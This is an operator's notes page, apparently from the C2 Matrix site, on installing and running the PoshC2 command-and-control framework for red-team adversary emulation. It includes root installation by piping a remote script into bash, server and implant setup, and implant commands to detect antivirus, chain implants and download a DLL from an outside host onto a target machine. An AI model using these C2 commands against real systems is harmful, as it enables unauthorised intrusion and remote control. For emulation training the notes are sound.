C2 Matrix
Search…
C2 Matrix
The C2 Matrix
SANS Slingshot C2 Matrix VM
Contribute
Lab Infrastructure
C2 Matrix Eval Lab
Basic Lab
Virtual Machines with C2s
Docker
Resources
C2
Caldera
Covenant
Empire
Faction
ibombshell
Koadic
Merlin
Mythic
Nuages
PoshC2
PowerHub
SilentTrinity
Sliver
SCYTHE
TrevorC2
Attack Infrastructure
Resources
Redirectors/Relays
Detection
Basics
Beacons
JA3/JA3S Hashes
JARM
Powered By
GitBook
PoshC2
PoshC2 is pretty well documented, below are my notes. Best to use the official documentation:
https://poshc2.readthedocs.io/en/latest/
Demo of PoshC2 is in this
Red Team Village
and
Texas Cyber Summit
June'gle
event:
Install PoshC2
sudo su -
curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2/master/Install.sh | bash
Configure and Run PoshC2
sudo su -
cd /opt/PoshC2
posh-project -n test
posh-config
Modify the values in the file, consider: BindIP; PayloadCommsHost; UserAgent
Launch Server
sudo su -
posh-server
On launch, PoshC2 generates a number of payloads into /opt/PoshC2_Project and creates a quick start file.
cat /opt/PoshC2_Project/quickstart.txt
Launch Handler
sudo su -
posh -u georgy
Deploy Agent
Use the multitude of methods to deploy the agent from the quickstart.txt file.
Emulate TTPs
Run PowerShell Scripts
loadmodule /home/slingshot/CozyBear/stepTwelve.ps1
detectav
software
Chaining
Run the following command from the implant you want to use as the daisy server.
startdaisy
Download a file
web-upload-file -from 'https://mint.scythedemo.com/ServiceLogin?passive=Gc5H5HZdakKD8ZWuaUcX2Q&b=true' -to 'C:\Users\Jorge\Desktop\scythe.dll'
Other Resources
https://redteaming.co.uk/2020/06/26/poshc2-shellcode-and-binary-patching/
https://yaksas.in/ycscblog/poshc2-a-red-teamers-notes/
C2 - Previous
Nuages
Next - C2
PowerHub
Last modified
1yr ago
Copy link
Outline
Install PoshC2
Configure and Run PoshC2
Launch Server
Launch Handler
Deploy Agent
Emulate TTPs
Run PowerShell Scripts
Chaining
Download a file
Other Resources